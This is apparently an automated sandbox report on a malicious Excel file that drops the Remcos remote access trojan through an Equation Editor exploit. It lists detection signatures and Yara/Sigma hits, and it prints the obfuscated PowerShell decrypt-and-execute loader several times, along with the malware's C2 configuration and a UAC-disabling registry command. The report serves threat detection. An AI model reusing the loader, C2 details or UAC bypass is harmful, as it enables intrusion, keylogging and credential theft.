Windows Analysis Report
AWD 490104998518.xls

Overview

General Information

Sample name: AWD 490104998518.xls
Analysis ID: 1482975
MD5: f63c009bccbc4d8d26d162a168feaeb1
SHA1: fa8ab13582703932f968a31e6cc0973e45ca43e0
SHA256: f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3
Tags: xls
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 724 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 2504 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3120 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3196 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • RegAsm.exe (PID: 3384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x14a5:$obj2: \objdata
  • 0x148f:$obj3: \objupdate
  • 0x146c:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09A9DB5.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x14a5:$obj2: \objdata
  • 0x148f:$obj3: \objupdate
  • 0x146c:$obj6: \objlink
C:\Users\user\AppData\Local\Temp\note\nots.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
    Source | Rule | Description | Author | Strings
    0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
      0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
        0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Source | Rule | Description | Author | Strings
        10.2.powershell.exe.41fd080.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
          10.2.powershell.exe.41fd080.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
            10.2.powershell.exe.41fd080.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
            • 0x690a8:$a1: Remcos restarted by watchdog!
            • 0x69620:$a3: %02i:%02i:%02i:%03i
            10.2.powershell.exe.41fd080.0.unpack | REMCOS_RAT_variants | unknown | unknown
            • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6316c:$str_b2: Executing file:
            • 0x641ec:$str_b3: GetDirectListeningPort
            • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x63d18:$str_b7: \update.vbs
            • 0x63194:$str_b9: Downloaded file:
            • 0x63180:$str_b10: Downloading file:
            • 0x63224:$str_b12: Failed to upload file:
            • 0x641b4:$str_b13: StartForward
            • 0x641d4:$str_b14: StopForward
            • 0x63c70:$str_b15: fso.DeleteFile "
            • 0x63c04:$str_b16: On Error Resume Next
            • 0x63ca0:$str_b17: fso.DeleteFolder "
            • 0x63214:$str_b18: Uploaded file:
            • 0x631d4:$str_b19: Unable to delete:
            • 0x63c38:$str_b20: while fso.FileExists("
            • 0x636b1:$str_c0: [Firefox StoredLogins not found]
            10.2.powershell.exe.41fd080.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
            • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x62f7c:$s1: CoGetObject
            • 0x62f90:$s1: CoGetObject
            • 0x62fac:$s1: CoGetObject
            • 0x6cf38:$s1: CoGetObject
            • 0x62f3c:$s2: Elevation:Administrator!new:

            Exploits

            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.176.174, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3120, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3120, TargetFilename: C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3120, Protocol: tcp, SourceIp: 192.3.176.174, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnI[base64 payload omitted]CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 724, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , ProcessId: 3196, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 724, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , ProcessId: 3196, ProcessName: wscript.exe
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 724, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 724, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS" , ProcessId: 3196, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: [binary value data omitted], EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 724, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnI[base64 payload omitted]CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
